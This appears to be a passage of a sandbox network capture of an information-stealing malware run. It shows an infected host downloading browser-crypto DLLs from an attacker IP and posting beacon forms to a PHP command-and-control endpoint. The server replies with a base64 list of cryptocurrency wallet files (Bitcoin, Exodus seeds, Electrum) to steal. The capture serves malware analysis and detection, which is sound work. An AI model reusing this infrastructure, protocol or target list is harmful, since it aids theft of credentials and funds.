                                                                                                                                                                                                                                                            Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00 00 00 90 0a 00 78 03 00 00 00 00 00 00 00 00 00 00 00 46 0a 00 50 2f 00 00 00 a0 0a 00 f0 23 00 00 94 16 0a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 20 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 a4 1e [TRUNCATED]
                                                                                                                                                                                                                                                            Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!4p@AHSxFP/# @.text `.rdata @@.data<F0@.00cfg@@.rsrcx@@.reloc#$"@B
                                                                                                                                                                                                                                                            Dec 21, 2024 22:17:47.565772057 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 55 89 e5 68 4f 01 00 00 e8 f2 0b 08 00 83 c4 04 85 c0 74 0e 89 80 38 01 00 00 83 c0 0f 83 e0 f0 5d c3 68 13 e0 ff ff e8 c7 0b
                                                                                                                                                                                                                                                            Data Ascii: UhOt8]h1]UWVEtu}UMt"0(h&40jVjjRQP?^_]USWVhO?t0
                                                                                                                                                                                                                                                            Dec 21, 2024 22:17:47.565788031 CET1236INData Raw: 55 07 08 00 83 c4 08 eb ce cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 83 e4 f8 83 ec 58 89 4c 24 2c 8b 7d 1c a1 b4 30 0a 10 31 e8 89 44 24 50 c7 44 24 3c 10 00 00 00 83 ff 18 72 19 89 f8 83 e0 07 75 12 8d 47 f8 3b 45 14 76 14 68 03 e0 ff
                                                                                                                                                                                                                                                            Data Ascii: UUSWVXL$,}01D$PD$<ruG;Evhh|$,}uT$4D$0P|OL$8PVS'D$@?@L$L$D$D$D$$
                                                                                                                                                                                                                                                            Dec 21, 2024 22:17:47.565849066 CET672INData Raw: 55 89 e5 53 57 56 83 ec 24 8b 4d 1c 8b 75 0c a1 b4 30 0a 10 31 e8 89 45 f0 8b 7d 08 8d 59 f8 83 f9 10 75 32 8d 45 dc 8d 4d e0 6a 10 ff 75 18 6a 10 50 51 57 e8 f7 93 06 00 83 c4 18 89 c7 8d 75 e8 83 45 dc f8 c7 45 d8 00 00 00 00 85 ff 0f 85 b4 01
                                                                                                                                                                                                                                                            Data Ascii: USWV$Mu01E}Yu2EMjujPQWuEEC1;]vS{EE1uuSPVEPo9]SUYY)ZYEME]M)19D
                                                                                                                                                                                                                                                            Dec 21, 2024 22:17:47.565865040 CET1236INData Raw: c7 47 08 00 00 00 00 89 47 04 8b 48 04 ff 15 00 80 0a 10 ff d1 89 07 be ff ff ff ff 85 c0 74 49 8b 55 10 89 f9 ff 75 18 ff 75 14 e8 40 00 00 00 83 c4 08 85 c0 74 30 8b 1f 85 db 74 2c 8b 47 04 8b 48 0c ff 15 00 80 0a 10 6a 01 53 ff d1 83 c4 08 eb
                                                                                                                                                                                                                                                            Data Ascii: GGHtIUuu@t0t,GHjShv1^_[]USWVLU01E}Yt9vhC9Us[KSFHuWSFHE}j@PWS
                                                                                                                                                                                                                                                            Dec 21, 2024 22:17:47.565880060 CET1236INData Raw: 57 56 8b 75 0c 8b 7d 10 8b 45 08 8b 18 8b 40 04 8b 48 14 ff 15 00 80 0a 10 57 56 53 ff d1 83 c4 0c 5e 5f 5b 5d c3 cc cc cc cc cc cc 55 89 e5 53 57 56 50 8b 4d 14 8b 7d 08 8b 47 04 39 08 76 17 68 05 e0 ff ff e8 b5 fa 07 00 83 c4 04 b8 ff ff ff ff
                                                                                                                                                                                                                                                            Data Ascii: WVu}E@HWVS^_[]USWVPM}G9vhuHuVuSO;upISEGHpVSu7GHES]SV7GHuuSV1
                                                                                                                                                                                                                                                            Dec 21, 2024 22:17:47.565896988 CET1236INData Raw: 56 ff 75 18 50 ff 75 10 e8 0b 00 00 00 83 c4 10 5e 5d c3 cc cc cc cc cc 55 89 e5 53 57 56 83 ec 34 89 4d f0 8b 45 14 89 45 d8 39 45 0c 73 17 68 03 e0 ff ff e8 f2 f5 07 00 83 c4 04 b8 ff ff ff ff e9 79 08 00 00 89 55 e4 8b 7d 10 8b 5d 08 8b 45 f0
                                                                                                                                                                                                                                                            Data Ascii: VuPu^]USWV4MEE9EshyU}]E}}aM}$7$7u2M$E}$7$7u]S2MQE}
                                                                                                                                                                                                                                                            Dec 21, 2024 22:17:47.565912962 CET1236INData Raw: e8 66 0f 70 d2 e8 66 0f 62 ca 66 0f 6e 54 07 04 66 0f 60 d3 66 0f 61 d3 66 0f eb cf 66 0f 72 f4 17 66 0f fe e5 f3 0f 5b e4 66 0f 70 ea f5 66 0f f4 d4 66 0f 70 e4 f5 66 0f f4 e5 66 0f 70 d2 e8 66 0f 70 e4 e8 66 0f 62 d4 66 0f eb d6 83 c6 10 66 0f
                                                                                                                                                                                                                                                            Data Ascii: fpfbfnTf`faffrf[fpffpffpfpfbff!~sMEMEUxEUMfEMUTFtFMUEM)ffo 1ffo f
                                                                                                                                                                                                                                                            Dec 21, 2024 22:17:47.573904991 CET1236INData Raw: 55 f0 0f b6 04 02 c1 e0 10 09 c8 8b 4d e8 8b 55 ec 01 d1 83 c1 04 0f b6 c9 8b 55 f0 0f b6 14 0a 00 d3 0f b6 f3 8b 7d f0 8a 34 37 8b 7d f0 88 34 0f 8b 4d f0 88 14 31 8b 75 d8 00 d6 0f b6 ce 8b 55 f0 0f b6 14 0a c1 e2 18 09 c2 33 55 e0 8b 4d c4 8b
                                                                                                                                                                                                                                                            Data Ascii: UMUU}47}4M1uU3UMEM}}Eu;uUM}Et}EPEE},7,7E@2
                                                                                                                                                                                                                                                            Dec 21, 2024 22:17:47.573986053 CET1236INData Raw: f0 fe ff ff 8b 5d e4 11 d3 03 85 5c ff ff ff 89 45 d0 11 f3 89 5d e4 31 d9 8b 95 64 ff ff ff 31 c2 89 d0 0f a4 c8 10 0f ac ca 10 89 95 64 ff ff ff 8b 4d c4 01 d1 89 4d c4 11 c7 89 c3 89 7d bc 31 fe 8b 85 5c ff ff ff 31 c8 89 f1 0f a4 c1 01 89 4d
                                                                                                                                                                                                                                                            Data Ascii: ]\E]1d1dMM}1\1M\tH@uHD4U`uU1]d1dMMMUU1u1tpH8}pLE]
                                                                                                                                                                                                                                                            Dec 21, 2024 22:17:49.139849901 CET94OUTGET /68b591d6548ec281/mozglue.dll HTTP/1.1
                                                                                                                                                                                                                                                            Host: 185.215.113.206
                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                            Dec 21, 2024 22:17:49.585223913 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Date: Sat, 21 Dec 2024 21:17:49 GMT
                                                                                                                                                                                                                                                            Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                                            Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
                                                                                                                                                                                                                                                            ETag: "94750-5e7e950876500"
                                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                                            Content-Length: 608080
                                                                                                                                                                                                                                                            Content-Type: application/x-msdos-program
                                                                                                                                                                                                                                                            Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00 00 00 20 09 00 b0 08 00 00 00 00 00 00 00 00 00 00 00 18 09 00 50 2f 00 00 00 30 09 00 d8 41 00 00 14 53 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bc f8 07 00 18 00 00 00 68 d0 07 00 a0 00 00 00 00 00 00 00 00 00 00 00 ec bc [TRUNCATED]
                                                                                                                                                                                                                                                            Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!^j@A`W, P/0AShZ.texta `.rdata@@.dataD@.00cfg@@.tls@.rsrc @@.relocA0B@B
                                                                                                                                                                                                                                                            Dec 21, 2024 22:17:50.944631100 CET95OUTGET /68b591d6548ec281/msvcp140.dll HTTP/1.1
                                                                                                                                                                                                                                                            Host: 185.215.113.206
                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                            Dec 21, 2024 22:17:51.416147947 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Date: Sat, 21 Dec 2024 21:17:51 GMT
                                                                                                                                                                                                                                                            Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                                            Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
                                                                                                                                                                                                                                                            ETag: "6dde8-5e7e950876500"
                                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                                            Content-Length: 450024
                                                                                                                                                                                                                                                            Content-Type: application/x-msdos-program
                                                                                                                                                                                                                                                            Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 82 ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 28 06 00 00 82 00 00 00 00 00 00 60 d9 03 00 00 10 00 00 00 40 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 f0 [TRUNCATED]
                                                                                                                                                                                                                                                            Data Ascii: MZ@!L!This program cannot be run in DOS mode.$1C___)n__^"_^_\_[_Z____]_Rich_PEL0]"!(`@,@AgrA=`x8w@pc@.text&( `.dataH)@,@.idatapD@@.didat4X@.rsrcZ@@.reloc=>^@B
                                                                                                                                                                                                                                                            Dec 21, 2024 22:17:52.657217979 CET91OUTGET /68b591d6548ec281/nss3.dll HTTP/1.1
                                                                                                                                                                                                                                                            Host: 185.215.113.206
                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                            Dec 21, 2024 22:17:53.102832079 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Date: Sat, 21 Dec 2024 21:17:52 GMT
                                                                                                                                                                                                                                                            Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                                            Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
                                                                                                                                                                                                                                                            ETag: "1f3950-5e7e950876500"
                                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                                            Content-Length: 2046288
                                                                                                                                                                                                                                                            Content-Type: application/x-msdos-program
                                                                                                                                                                                                                                                            Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00 00 00 50 1e 00 78 03 00 00 00 00 00 00 00 00 00 00 00 0a 1f 00 50 2f 00 00 00 60 1e 00 5c 08 01 00 b0 01 1d 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 f0 19 00 a0 00 00 00 00 00 00 00 00 00 00 00 7c ca [TRUNCATED]
                                                                                                                                                                                                                                                            Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!.`pl- @A&@PxP/`\|\&@.text `.rdatal@@.dataDR.@.00cfg@@@.rsrcxP@@.reloc\`@B
                                                                                                                                                                                                                                                            Dec 21, 2024 22:17:56.442574024 CET95OUTGET /68b591d6548ec281/softokn3.dll HTTP/1.1
                                                                                                                                                                                                                                                            Host: 185.215.113.206
                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                            Dec 21, 2024 22:17:56.888284922 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Date: Sat, 21 Dec 2024 21:17:56 GMT
                                                                                                                                                                                                                                                            Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                                            Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
                                                                                                                                                                                                                                                            ETag: "3ef50-5e7e950876500"
                                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                                            Content-Length: 257872
                                                                                                                                                                                                                                                            Content-Type: application/x-msdos-program
                                                                                                                                                                                                                                                            Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00 00 00 b0 03 00 80 03 00 00 00 00 00 00 00 00 00 00 00 c0 03 00 50 2f 00 00 00 c0 03 00 c8 35 00 00 38 71 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 e0 02 00 a0 00 00 00 00 00 00 00 00 00 00 00 14 7b [TRUNCATED]
                                                                                                                                                                                                                                                            Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!PSg@ADvSwP/58q{.text& `.rdata@@.data|@.00cfg@@.rsrc@@.reloc56@B
                                                                                                                                                                                                                                                            Dec 21, 2024 22:17:57.771332026 CET99OUTGET /68b591d6548ec281/vcruntime140.dll HTTP/1.1
                                                                                                                                                                                                                                                            Host: 185.215.113.206
                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                            Dec 21, 2024 22:17:58.216990948 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Date: Sat, 21 Dec 2024 21:17:57 GMT
                                                                                                                                                                                                                                                            Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                                            Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
                                                                                                                                                                                                                                                            ETag: "13bf0-5e7e950876500"
                                                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                                                            Content-Length: 80880
                                                                                                                                                                                                                                                            Content-Type: application/x-msdos-program
                                                                                                                                                                                                                                                            Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 de 00 00 00 1c 00 00 00 00 00 00 90 d9 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 30 01 00 00 04 00 00 d4 6d 01 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 [TRUNCATED]
                                                                                                                                                                                                                                                            Data Ascii: MZ@!L!This program cannot be run in DOS mode.$08euRichPEL|0]"!0m@AA 8 @.text `.data@.idata@@.rsrc@@.reloc @B
                                                                                                                                                                                                                                                            Dec 21, 2024 22:17:59.511082888 CET203OUTPOST /c4becf79229cb002.php HTTP/1.1
                                                                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=----FBGHCGCAEBFIJKFIDBGH
                                                                                                                                                                                                                                                            Host: 185.215.113.206
                                                                                                                                                                                                                                                            Content-Length: 1067
                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                            Dec 21, 2024 22:18:00.631974936 CET202INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Date: Sat, 21 Dec 2024 21:17:59 GMT
                                                                                                                                                                                                                                                            Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                                            Content-Length: 0
                                                                                                                                                                                                                                                            Keep-Alive: timeout=5, max=91
                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                            Dec 21, 2024 22:18:02.585091114 CET469OUTPOST /c4becf79229cb002.php HTTP/1.1
                                                                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=----CFCBFBGDBKJKECAAKKFH
                                                                                                                                                                                                                                                            Host: 185.215.113.206
                                                                                                                                                                                                                                                            Content-Length: 267
                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                            Data Raw: 2d 2d 2d 2d 2d 2d 43 46 43 42 46 42 47 44 42 4b 4a 4b 45 43 41 41 4b 4b 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 65 62 37 32 37 30 37 64 34 61 37 66 35 39 39 39 33 61 31 37 38 34 64 64 65 36 34 63 38 66 30 63 36 37 39 66 63 36 38 32 30 35 30 31 30 62 31 33 32 37 35 31 38 63 33 34 31 33 37 64 38 34 63 31 37 39 38 37 64 31 64 0d 0a 2d 2d 2d 2d 2d 2d 43 46 43 42 46 42 47 44 42 4b 4a 4b 45 43 41 41 4b 4b 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 61 6c 6c 65 74 73 0d 0a 2d 2d 2d 2d 2d 2d 43 46 43 42 46 42 47 44 42 4b 4a 4b 45 43 41 41 4b 4b 46 48 2d 2d 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: ------CFCBFBGDBKJKECAAKKFHContent-Disposition: form-data; name="token"0eb72707d4a7f59993a1784dde64c8f0c679fc68205010b1327518c34137d84c17987d1d------CFCBFBGDBKJKECAAKKFHContent-Disposition: form-data; name="message"wallets------CFCBFBGDBKJKECAAKKFH--
                                                                                                                                                                                                                                                            Dec 21, 2024 22:18:03.035738945 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Date: Sat, 21 Dec 2024 21:18:02 GMT
                                                                                                                                                                                                                                                            Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                                                            Content-Length: 2408
                                                                                                                                                                                                                                                            Keep-Alive: timeout=5, max=90
                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                            Data Raw: 51 6d 6c 30 59 32 39 70 62 69 42 44 62 33 4a 6c 66 44 46 38 58 45 4a 70 64 47 4e 76 61 57 35 63 64 32 46 73 62 47 56 30 63 31 78 38 64 32 46 73 62 47 56 30 4c 6d 52 68 64 48 77 78 66 45 4a 70 64 47 4e 76 61 57 34 67 51 32 39 79 5a 53 42 50 62 47 52 38 4d 58 78 63 51 6d 6c 30 59 32 39 70 62 6c 78 38 4b 6e 64 68 62 47 78 6c 64 43 6f 75 5a 47 46 30 66 44 42 38 52 47 39 6e 5a 57 4e 76 61 57 35 38 4d 58 78 63 52 47 39 6e 5a 57 4e 76 61 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 46 4a 68 64 6d 56 75 49 45 4e 76 63 6d 56 38 4d 58 78 63 55 6d 46 32 5a 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 45 52 68 5a 57 52 68 62 48 56 7a 49 45 31 68 61 57 35 75 5a 58 52 38 4d 58 78 63 52 47 46 6c 5a 47 46 73 64 58 4d 67 54 57 46 70 62 6d 35 6c 64 46 78 33 59 57 78 73 5a 58 52 7a 58 48 78 7a 61 47 55 71 4c 6e 4e 78 62 47 6c 30 5a 58 77 77 66 45 4a 73 62 32 4e 72 63 33 52 79 5a 57 46 74 49 45 64 79 5a 57 56 75 66 44 46 38 58 45 4a 73 62 32 4e 72 63 33 52 79 5a 57 [TRUNCATED]
                                                                                                                                                                                                                                                            Data Ascii: Qml0Y29pbiBDb3JlfDF8XEJpdGNvaW5cd2FsbGV0c1x8d2FsbGV0LmRhdHwxfEJpdGNvaW4gQ29yZSBPbGR8MXxcQml0Y29pblx8KndhbGxldCouZGF0fDB8RG9nZWNvaW58MXxcRG9nZWNvaW5cfCp3YWxsZXQqLmRhdHwwfFJhdmVuIENvcmV8MXxcUmF2ZW5cfCp3YWxsZXQqLmRhdHwwfERhZWRhbHVzIE1haW5uZXR8MXxcRGFlZGFsdXMgTWFpbm5ldFx3YWxsZXRzXHxzaGUqLnNxbGl0ZXwwfEJsb2Nrc3RyZWFtIEdyZWVufDF8XEJsb2Nrc3RyZWFtXEdyZWVuXHdhbGxldHNcfCouKnwxfFdhc2FiaSBXYWxsZXR8MXxcV2FsbGV0V2FzYWJpXENsaWVudFxXYWxsZXRzXHwqLmpzb258MHxFdGhlcmV1bXwxfFxFdGhlcmV1bVx8a2V5c3RvcmV8MHxFbGVjdHJ1bXwxfFxFbGVjdHJ1bVx3YWxsZXRzXHwqLip8MHxFbGVjdHJ1bUxUQ3wxfFxFbGVjdHJ1bS1MVENcd2FsbGV0c1x8Ki4qfDB8RXhvZHVzfDF8XEV4b2R1c1x8ZXhvZHVzLmNvbmYuanNvbnwwfEV4b2R1c3wxfFxFeG9kdXNcfHdpbmRvdy1zdGF0ZS5qc29ufDB8RXhvZHVzXGV4b2R1cy53YWxsZXR8MXxcRXhvZHVzXGV4b2R1cy53YWxsZXRcfHBhc3NwaHJhc2UuanNvbnwwfEV4b2R1c1xleG9kdXMud2FsbGV0fDF8XEV4b2R1c1xleG9kdXMud2FsbGV0XHxzZWVkLnNlY298MHxFeG9kdXNcZXhvZHVzLndhbGxldHwxfFxFeG9kdXNcZXhvZHVzLndhbGxldFx8aW5mby5zZWNvfDB8RWxlY3Ryb24gQ2FzaHwxfFxFbGVjdHJvbkNhc2hcd2FsbGV0c1x8Ki4qfDB8TXVsdGlEb2dlfDF8
                                                                                                                                                                                                                                                            Dec 21, 2024 22:18:03.089399099 CET467OUTPOST /c4becf79229cb002.php HTTP/1.1
                                                                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=----EBAKEBAECGCBAAAAAEBA
                                                                                                                                                                                                                                                            Host: 185.215.113.206
                                                                                                                                                                                                                                                            Content-Length: 265
                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                            Data Raw: 2d 2d 2d 2d 2d 2d 45 42 41 4b 45 42 41 45 43 47 43 42 41 41 41 41 41 45 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 65 62 37 32 37 30 37 64 34 61 37 66 35 39 39 39 33 61 31 37 38 34 64 64 65 36 34 63 38 66 30 63 36 37 39 66 63 36 38 32 30 35 30 31 30 62 31 33 32 37 35 31 38 63 33 34 31 33 37 64 38 34 63 31 37 39 38 37 64 31 64 0d 0a 2d 2d 2d 2d 2d 2d 45 42 41 4b 45 42 41 45 43 47 43 42 41 41 41 41 41 45 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 69 6c 65 73 0d 0a 2d 2d 2d 2d 2d 2d 45 42 41 4b 45 42 41 45 43 47 43 42 41 41 41 41 41 45 42 41 2d 2d 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: ------EBAKEBAECGCBAAAAAEBAContent-Disposition: form-data; name="token"0eb72707d4a7f59993a1784dde64c8f0c679fc68205010b1327518c34137d84c17987d1d------EBAKEBAECGCBAAAAAEBAContent-Disposition: form-data; name="message"files------EBAKEBAECGCBAAAAAEBA--
                                                                                                                                                                                                                                                            Dec 21, 2024 22:18:03.536792994 CET202INHTTP/1.1 200 OK
